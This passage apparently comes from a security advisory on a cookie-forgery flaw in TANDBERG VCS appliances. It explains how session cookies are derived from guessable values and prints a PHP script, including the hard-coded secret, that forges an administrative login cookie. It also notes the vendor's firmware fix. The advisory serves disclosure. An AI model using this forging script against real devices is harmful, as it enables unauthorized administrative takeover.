IP address, STATIC_VALUE represents a fixed string which is hard-coded into the application source, USERNAME is the authenticated user name, CLIENT_ADDRESS is the IP address of the user's system, CURRENT_TIME is a simple UNIX time stamp, and ACCESS_RIGHTS is an integer denoting the level of access assigned to the user. Note, that none of the information above is difficult to guess. Any owner of a TANDBERG VCS would have access to the STATIC_VALUE (and in fact, this value is contained in the firmware updates[2]). All TANDBERG appliances have a default user name of "admin" which has full privileges. Therefore, it is possible with a simple PHP script to forge new cookies and access the administrative interface: // NOTE: Portions of the following code are Copyright (C) 2009 TANDBERG // function objectToCookie($obj) { $cookie = serialize($obj); $cookie = gzcompress($cookie); $cookie = base64_encode($cookie); return $cookie; } function genCookie($server_addr, $remote_addr) { $user_name = "root"; $secret = $server_addr . "139EF012B6A714A3BE0A867616C7F8"; $time = time()+24*60*60; $id_hash = md5($user_name . $secret . $remote_addr . $time); $access = 1; // ReadWrite $login_cookie = array( "user_name" => $user_name, "access" => $access, "id_hash" => $id_hash, "ip" => $remote_addr, "time" => $time ); return objectToCookie($login_cookie); } print "Cookie: tandberg_login=" . urlencode(genCookie("{{SERVER_IP}}", "{{CLIENT_IP}}")) . "\n"; // end of script // TANDBERG released firmware version x4.3.0 which corrects this issue on October 9, 2009 (prior to discovery of the vulnerability by VSR). The release notes[3] for this updated version contain a description of the issue: &qu